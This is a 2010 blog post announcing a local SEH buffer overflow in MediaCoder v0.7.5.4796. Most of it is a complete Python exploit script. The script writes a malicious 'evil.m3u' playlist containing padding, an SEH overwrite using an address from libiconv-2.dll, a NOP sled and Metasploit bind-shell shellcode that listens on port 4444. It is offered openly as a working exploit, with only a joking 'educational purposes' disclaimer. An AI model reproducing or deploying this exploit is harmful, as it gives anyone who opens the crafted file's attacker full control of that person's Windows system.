Thursday, December 9, 2010

MediaCoder v0.7.5.4796 Local Buffer Overflow [ SEH ]

Recently I came across EDB http://www.exploit-db.com/exploits/15630 - MediaCoder v0.7.5.4792 SEH overflow exploit.


So, decided to verify the current release 0.7.5.4796 as well. There is a buffer overflow in this version which can allow an attacker to gain complete control of the system running this application.




Here is the exploit I wrote, for educational purposes only of course. :-)


#!/usr/bin/python


import sys


# Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ]
# Download: http://www.mediacoderhq.com/getfile.htm?site=download.mediacoderhq.com&file=MediaCoder-0.7.5.4796.exe


print "\n"
print "#"
print "********************************************************************* *"
print "#                                                                                                   #"
print "*  MediaCoder version <=v0.7.5.4796 SEH Buffer Overflow     *"
print "*  Author : Karn Ganeshen                                                           *"
print "*  Date : December 05, 2010                                                        *"
print "*  KarnGaneshen [aT] gmail [d0t] c0m                                        *"
print "*  http://ipositivesecurity.blogspot.com                                        *"
print "#                                                                                                  #"
print "**********************************************************************"
print "#\n"


if len(sys.argv) > 1:
    print "Usage: ./mcoder.py\n"
    sys.exit(1)


junk = "\x41" * 764
nseh = "\xEB\x06\x90\x90"#  Short jump
seh = "\x87\x71\x01\x66" #  0x66017187 / C:\Program Files\MediaCoder\libiconv-2.dll
nops = "\x90" * 24


# win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
shellcode = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x43"
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x53\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x62"
"\x4a\x48\x6b\x70\x4d\x38\x68\x6c\x39\x4b\x4f\x79\x6f\x6b\x4f\x73"
"\x50\x4c\x4b\x72\x4c\x46\x44\x57\x54\x4e\x6b\x31\x55\x67\x4c\x4e"
"\x6b\x63\x4c\x34\x45\x62\x58\x46\x61\x48\x6f\x4e\x6b\x50\x4f\x44"
"\x58\x6c\x4b\x51\x4f\x45\x70\x44\x41\x6a\x4b\x70\x49\x6e\x6b\x35"
"\x64\x4c\x4b\x53\x31\x78\x6e\x75\x61\x6b\x70\x4f\x69\x6e\x4c\x4b"
"\x34\x4f\x30\x53\x44\x57\x77\x6f\x31\x4b\x7a\x74\x4d\x75\x51\x69"
"\x52\x68\x6b\x48\x74\x57\x4b\x70\x54\x64\x64\x47\x58\x50\x75\x6d"
"\x35\x4c\x4b\x31\x4f\x36\x44\x56\x61\x78\x6b\x63\x56\x6c\x4b\x54"
"\x4c\x70\x4b\x4e\x6b\x53\x6f\x75\x4c\x47\x71\x5a\x4b\x63\x33\x54"
"\x6c\x4e\x6b\x6b\x39\x30\x6c\x44\x64\x35\x4c\x71\x71\x5a\x63\x34"
"\x71\x6b\x6b\x72\x44\x6c\x4b\x37\x33\x76\x50\x4e\x6b\x71\x50\x56"
"\x6c\x6c\x4b\x44\x30\x65\x4c\x4c\x6d\x4c\x4b\x77\x30\x35\x58\x61"
"\x4e\x62\x48\x6c\x4e\x62\x6e\x44\x4e\x38\x6c\x50\x50\x4b\x4f\x5a"
"\x76\x45\x36\x70\x53\x41\x76\x32\x48\x70\x33\x56\x52\x45\x38\x42"
"\x57\x72\x53\x34\x72\x63\x6f\x72\x74\x6b\x4f\x78\x50\x72\x48\x38"
"\x4b\x58\x6d\x6b\x4c\x65\x6b\x42\x70\x49\x6f\x69\x46\x71\x4f\x6c"
"\x49\x6a\x45\x65\x36\x4f\x71\x4a\x4d\x35\x58\x53\x32\x50\x55\x32"
"\x4a\x35\x52\x49\x6f\x48\x50\x31\x78\x7a\x79\x36\x69\x4c\x35\x6c"
"\x6d\x70\x57\x39\x6f\x6e\x36\x70\x53\x32\x73\x62\x73\x56\x33\x52"
"\x73\x73\x73\x52\x73\x33\x73\x30\x53\x6b\x4f\x4a\x70\x35\x36\x75"
"\x38\x52\x31\x41\x4c\x61\x76\x50\x53\x4d\x59\x4d\x31\x4d\x45\x55"
"\x38\x69\x34\x56\x7a\x42\x50\x5a\x67\x36\x37\x79\x6f\x7a\x76\x61"
"\x7a\x76\x70\x66\x31\x73\x65\x39\x6f\x68\x50\x41\x78\x4d\x74\x4e"
"\x4d\x76\x4e\x68\x69\x42\x77\x79\x6f\x59\x46\x36\x33\x66\x35\x69"
"\x6f\x6e\x30\x45\x38\x4b\x55\x51\x59\x6f\x76\x72\x69\x42\x77\x6b"
"\x4f\x4a\x76\x70\x50\x46\x34\x36\x34\x53\x65\x79\x6f\x6e\x30\x6c"
"\x53\x65\x38\x4b\x57\x70\x79\x5a\x66\x52\x59\x30\x57\x69\x6f\x6a"
"\x76\x30\x55\x59\x6f\x6e\x30\x70\x66\x70\x6a\x53\x54\x72\x46\x62"
"\x48\x65\x33\x50\x6d\x6c\x49\x4d\x35\x31\x7a\x52\x70\x70\x59\x44"
"\x69\x7a\x6c\x4c\x49\x69\x77\x51\x7a\x71\x54\x4f\x79\x4b\x52\x34"
"\x71\x39\x50\x4c\x33\x4d\x7a\x6b\x4e\x71\x52\x44\x6d\x6b\x4e\x37"
"\x32\x54\x6c\x4e\x73\x4e\x6d\x33\x4a\x56\x58\x6c\x6b\x6c\x6b\x6e"
"\x4b\x53\x58\x64\x32\x69\x6e\x6c\x73\x44\x56\x6b\x4f\x73\x45\x47"
"\x34\x4b\x4f\x79\x46\x33\x6b\x42\x77\x73\x62\x30\x51\x73\x61\x72"
"\x71\x62\x4a\x33\x31\x42\x71\x50\x51\x72\x75\x50\x51\x49\x6f\x78"
"\x50\x71\x78\x4e\x4d\x39\x49\x75\x55\x6a\x6e\x70\x53\x4b\x4f\x59"
"\x46\x32\x4a\x4b\x4f\x49\x6f\x56\x57\x69\x6f\x5a\x70\x4e\x6b\x33"
"\x67\x49\x6c\x6d\x53\x39\x54\x55\x34\x39\x6f\x4b\x66\x31\x42\x69"
"\x6f\x4a\x70\x62\x48\x78\x70\x4d\x5a\x35\x54\x63\x6f\x70\x53\x39"
"\x6f\x4e\x36\x39\x6f\x38\x50\x43")


more = "\x90" * 10


exploit = junk + nseh + seh + nops + shellcode + more


try:
    f = open("evil.m3u",'w')
    f.write(exploit)
    f.close()
    print "[+] Generating exploit file..."
    print "[+] +++Evil m3u created+++ ^_^\n"
except:
    print "[!] +++Error occured+++ \n"
Update: It's on packetstorm now [ http://packetstormsecurity.org/files/view/99350/mcoder-localBufferOverflow.py.txt ]


Best Regards.

No comments:

Post a Comment

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.